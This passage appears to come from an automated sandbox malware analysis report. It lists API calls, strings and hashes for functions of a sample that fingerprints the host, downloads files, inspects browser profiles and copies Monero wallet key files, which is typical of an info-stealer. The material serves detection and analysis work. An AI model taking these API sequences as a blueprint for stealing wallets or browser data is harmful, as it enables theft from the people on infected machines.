                                                                                                                                                                    • RegEnumKeyExA.KERNEL32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 004112B0
                                                                                                                                                                    • wsprintfA.USER32 ref: 004112DD
                                                                                                                                                                    • RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 004112FC
                                                                                                                                                                    • RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?), ref: 00411332
                                                                                                                                                                    • lstrlenA.KERNEL32(?), ref: 00411347
                                                                                                                                                                      • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                                                                      • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                                                                      • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                                                                      • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                                                                    • RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?,?,00436E8C), ref: 004113DC
                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00411446
                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00411466
                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00411472
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Closelstrcpy$OpenQueryValuelstrlen$Enumlstrcatwsprintf
                                                                                                                                                                    • String ID: - $%s\%s$?
                                                                                                                                                                    • API String ID: 2394436309-3278919252
                                                                                                                                                                    • Opcode ID: 617242c50c5e9a7485eda1de3311a44ff0c10fdc2246e554a89d168bc2664c5f
                                                                                                                                                                    • Instruction ID: a1c3be3d6f3fdb40de360404d346c16f4973fffda027df273c7b2494bd9b7707
                                                                                                                                                                    • Opcode Fuzzy Hash: 617242c50c5e9a7485eda1de3311a44ff0c10fdc2246e554a89d168bc2664c5f
                                                                                                                                                                    • Instruction Fuzzy Hash: A861F6B590022C9BEF21DB15DD84EDAB7B9AB44708F1042E6A608A2121DF35AFC9CF54
                                                                                                                                                                    Function 004109A2 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 110memorystringCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetWindowsDirectoryA.KERNEL32(?,00000104,?,?,00000000), ref: 004109D5
                                                                                                                                                                    • GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00410A15
                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000000), ref: 00410A6A
                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00410A71
                                                                                                                                                                    • wsprintfA.USER32 ref: 00410AA7
                                                                                                                                                                    • lstrcatA.KERNEL32(00000000,00436E3C), ref: 00410AB6
                                                                                                                                                                      • Part of subcall function 00411684: GetCurrentHwProfileA.ADVAPI32(?), ref: 0041169F
                                                                                                                                                                      • Part of subcall function 00411684: _memset.LIBCMT ref: 004116CE
                                                                                                                                                                      • Part of subcall function 00411684: lstrcatA.KERNEL32(?,00000000,?,?,?,?,?), ref: 004116F6
                                                                                                                                                                      • Part of subcall function 00411684: lstrcatA.KERNEL32(?,00436ECC,?,?,?,?,?), ref: 00411713
                                                                                                                                                                    • lstrlenA.KERNEL32(?), ref: 00410ACD
                                                                                                                                                                      • Part of subcall function 004123D5: malloc.MSVCRT ref: 004123DA
                                                                                                                                                                      • Part of subcall function 004123D5: strncpy.MSVCRT ref: 004123EB
                                                                                                                                                                    • lstrcatA.KERNEL32(00000000,00000000), ref: 00410AF0
                                                                                                                                                                      • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: lstrcat$Heap$AllocCurrentDirectoryInformationProcessProfileVolumeWindows_memsetlstrcpylstrlenmallocstrncpywsprintf
                                                                                                                                                                    • String ID: wA$:\$C$QuBi
                                                                                                                                                                    • API String ID: 1856320939-1441494722
                                                                                                                                                                    • Opcode ID: 67b1be9e31ade1d1e820cd34b34a28b7063542f71b3e79275d8882d479f03449
                                                                                                                                                                    • Instruction ID: d36f890e74e7e8ef669b83a96deb31b174d36e7948efbde015f1e97a0a99ead9
                                                                                                                                                                    • Opcode Fuzzy Hash: 67b1be9e31ade1d1e820cd34b34a28b7063542f71b3e79275d8882d479f03449
                                                                                                                                                                    • Instruction Fuzzy Hash: B941AFB1A042289BCB249F749D85ADEBAB9EF19308F0000EAF109E3121E6758FD58F54
                                                                                                                                                                    Function 004067ED Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 110networkfileCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                                                                      • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
                                                                                                                                                                      • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
                                                                                                                                                                      • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
                                                                                                                                                                      • Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
                                                                                                                                                                      • Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E
                                                                                                                                                                    • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00406836
                                                                                                                                                                    • StrCmpCA.SHLWAPI(?), ref: 00406856
                                                                                                                                                                    • InternetOpenUrlA.WININET(?,?,00000000,00000000,-00800100,00000000), ref: 00406877
                                                                                                                                                                    • CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00406892
                                                                                                                                                                    • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004068C8
                                                                                                                                                                    • InternetReadFile.WININET(00000000,?,00000400,?), ref: 004068F8
                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00406923
                                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040692A
                                                                                                                                                                    • InternetCloseHandle.WININET(?), ref: 00406936
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                                                                                                                                                    • String ID: <+A
                                                                                                                                                                    • API String ID: 2507841554-2778417545
                                                                                                                                                                    • Opcode ID: 856b629bf82c4ff1a83c675378c3e7c10b8657cdf3afe6ec6eeb97d6b7c5d7bf
                                                                                                                                                                    • Instruction ID: 1d44a0941bf69239cbc718c5fc054d573873141a30687fa59e6c761baef87c5b
                                                                                                                                                                    • Opcode Fuzzy Hash: 856b629bf82c4ff1a83c675378c3e7c10b8657cdf3afe6ec6eeb97d6b7c5d7bf
                                                                                                                                                                    • Instruction Fuzzy Hash: 22411CB1900128ABDF20DB21DD49BDA7BB9EB04315F1040B6BB09B21A1D6359E958FA9
                                                                                                                                                                    Function 004168C6 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 79stringCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                                      • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                                                                      • Part of subcall function 00406963: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004069C5
                                                                                                                                                                      • Part of subcall function 00406963: StrCmpCA.SHLWAPI(?), ref: 004069DF
                                                                                                                                                                      • Part of subcall function 00406963: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406A0E
                                                                                                                                                                      • Part of subcall function 00406963: HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00406A4D
                                                                                                                                                                      • Part of subcall function 00406963: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00406A7D
                                                                                                                                                                      • Part of subcall function 00406963: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00406A88
                                                                                                                                                                      • Part of subcall function 00406963: HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00406AAC
                                                                                                                                                                      • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,ERROR), ref: 0041691A
                                                                                                                                                                    • lstrlenA.KERNEL32(?), ref: 00416925
                                                                                                                                                                      • Part of subcall function 00411E1F: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00416931,?), ref: 00411E37
                                                                                                                                                                    • StrStrA.SHLWAPI(00000000,?), ref: 0041693A
                                                                                                                                                                    • lstrlenA.KERNEL32(?), ref: 00416949
                                                                                                                                                                    • lstrlenA.KERNEL32(00000000), ref: 00416962
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: HttpInternetlstrcpylstrlen$OpenRequest$AllocConnectInfoLocalOptionQuerySend
                                                                                                                                                                    • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                                                                                                                                                    • API String ID: 4174444224-1526165396
                                                                                                                                                                    • Opcode ID: cba5ef62937bcd0ece7cfbe729aa70542ea14c206f344e1eed86aa985cb31328
                                                                                                                                                                    • Instruction ID: f999f3c62c0b23b7ff363c4994354db6f8ba44fc0c3398813b2d55053c878ef3
                                                                                                                                                                    • Opcode Fuzzy Hash: cba5ef62937bcd0ece7cfbe729aa70542ea14c206f344e1eed86aa985cb31328
                                                                                                                                                                    • Instruction Fuzzy Hash: 6021E571910204ABCB10BB75DC469DD77B8AF04308F11512BFC05E3191DB7DD9858F99
                                                                                                                                                                    Function 0040EABC Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 290COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • StrCmpCA.SHLWAPI(0094C481), ref: 0040EAF9
                                                                                                                                                                    • StrCmpCA.SHLWAPI(0094C481), ref: 0040EB56
                                                                                                                                                                    • StrCmpCA.SHLWAPI(0094C481,firefox), ref: 0040EE1D
                                                                                                                                                                    • StrCmpCA.SHLWAPI(0094C481), ref: 0040EC33
                                                                                                                                                                      • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                                                                    • StrCmpCA.SHLWAPI(0094C481), ref: 0040ECE3
                                                                                                                                                                    • StrCmpCA.SHLWAPI(0094C481), ref: 0040ED40
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: lstrcpy
                                                                                                                                                                    • String ID: Stable\$ Stable\$firefox
                                                                                                                                                                    • API String ID: 3722407311-2697854757
                                                                                                                                                                    • Opcode ID: f47b23f97fdeb4fe9174fc30896a49faa6594533cdb81bf1bfd78cb08f979325
                                                                                                                                                                    • Instruction ID: 5ee9920858f87ab95f25d72870b6309d75f224e844084726c2f6447a77145a42
                                                                                                                                                                    • Opcode Fuzzy Hash: f47b23f97fdeb4fe9174fc30896a49faa6594533cdb81bf1bfd78cb08f979325
                                                                                                                                                                    • Instruction Fuzzy Hash: 5FB19E72D00109AFDF20FFA9D947B8D7772AF40318F550126F904B7291DB78AA688BD9
                                                                                                                                                                    Function 00401AB8 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 129stringfileCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • _memset.LIBCMT ref: 00401ADC
                                                                                                                                                                      • Part of subcall function 00401A51: GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 00401A65
                                                                                                                                                                      • Part of subcall function 00401A51: HeapAlloc.KERNEL32(00000000), ref: 00401A6C
                                                                                                                                                                      • Part of subcall function 00401A51: RegOpenKeyExA.KERNEL32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,00401AE9), ref: 00401A89
                                                                                                                                                                      • Part of subcall function 00401A51: RegQueryValueExA.ADVAPI32(00401AE9,wallet_path,00000000,00000000,00000000,000000FF), ref: 00401AA4
                                                                                                                                                                      • Part of subcall function 00401A51: RegCloseKey.ADVAPI32(00401AE9), ref: 00401AAD
                                                                                                                                                                    • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 00401AF1
                                                                                                                                                                    • lstrlenA.KERNEL32(?), ref: 00401AFE
                                                                                                                                                                    • lstrcatA.KERNEL32(?,.keys), ref: 00401B19
                                                                                                                                                                      • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                                      • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                                                                      • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                                                                      • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                                                                      • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                                                                      • Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79
                                                                                                                                                                      • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                                                                      • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                                                                    • CopyFileA.KERNEL32(?,?,00000001), ref: 00401C2A
                                                                                                                                                                      • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                                                                      • Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
                                                                                                                                                                      • Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
                                                                                                                                                                      • Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
                                                                                                                                                                      • Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
                                                                                                                                                                      • Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034
                                                                                                                                                                    • DeleteFileA.KERNEL32(?), ref: 00401C9D
                                                                                                                                                                      • Part of subcall function 00416E97: CreateThread.KERNEL32(00000000,00000000,00416DC6,?,00000000,00000000), ref: 00416F36
                                                                                                                                                                      • Part of subcall function 00416E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F3E
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Filelstrcpy$lstrcat$AllocCloseCreateHeaplstrlen$CopyDeleteHandleLocalObjectOpenProcessQueryReadSingleSizeSystemThreadTimeValueWait_memset
                                                                                                                                                                    • String ID: .keys$\Monero\wallet.keys
                                                                                                                                                                    • API String ID: 615783205-3586502688
                                                                                                                                                                    • Opcode ID: bd28ef697300de5884e94e1d673300fc32a7f2f0cccbe00ca3c3488f143d60c0
                                                                                                                                                                    • Instruction ID: 0130a2ac35af31154b38bf277d642d4284bba686758d2f8fdbfb5a94e7082e10
                                                                                                                                                                    • Opcode Fuzzy Hash: bd28ef697300de5884e94e1d673300fc32a7f2f0cccbe00ca3c3488f143d60c0
                                                                                                                                                                    • Instruction Fuzzy Hash: C95160B1E9012D9BCF11EB25DD466DC7379AF04308F4054BAB608B3191DA78AFC98F58
                                                                                                                                                                    Function 00415DF7 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 120stringCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • lstrcatA.KERNEL32(?,?,00000000,?), ref: 00415E86
                                                                                                                                                                      • Part of subcall function 00411DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD
                                                                                                                                                                    • lstrcatA.KERNEL32(?,00000000), ref: 00415EA3
                                                                                                                                                                    • lstrcatA.KERNEL32(?,?), ref: 00415EC2
                                                                                                                                                                    • lstrcatA.KERNEL32(?,?), ref: 00415ED6
                                                                                                                                                                    • lstrcatA.KERNEL32(?), ref: 00415EE9
                                                                                                                                                                    • lstrcatA.KERNEL32(?,?), ref: 00415EFD
                                                                                                                                                                    • lstrcatA.KERNEL32(?), ref: 00415F10
                                                                                                                                                                      • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                                      • Part of subcall function 00411D92: GetFileAttributesA.KERNEL32(?,?,?,0040DA7F,?,?,?), ref: 00411D99
                                                                                                                                                                      • Part of subcall function 00415B0B: GetProcessHeap.KERNEL32(00000000,0098967F,?,?,?), ref: 00415B30
                                                                                                                                                                      • Part of subcall function 00415B0B: HeapAlloc.KERNEL32(00000000), ref: 00415B37
                                                                                                                                                                      • Part of subcall function 00415B0B: wsprintfA.USER32 ref: 00415B50
                                                                                                                                                                      • Part of subcall function 00415B0B: FindFirstFileA.KERNEL32(?,?), ref: 00415B67
                                                                                                                                                                      • Part of subcall function 00415B0B: StrCmpCA.SHLWAPI(?,00436A98), ref: 00415B88
                                                                                                                                                                      • Part of subcall function 00415B0B: StrCmpCA.SHLWAPI(?,00436A9C), ref: 00415BA2
                                                                                                                                                                      • Part of subcall function 00415B0B: wsprintfA.USER32 ref: 00415BC9
                                                                                                                                                                      • Part of subcall function 00415B0B: CopyFileA.KERNEL32(?,?,00000001), ref: 00415C86
                                                                                                                                                                      • Part of subcall function 00415B0B: DeleteFileA.KERNEL32(?), ref: 00415CA9
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
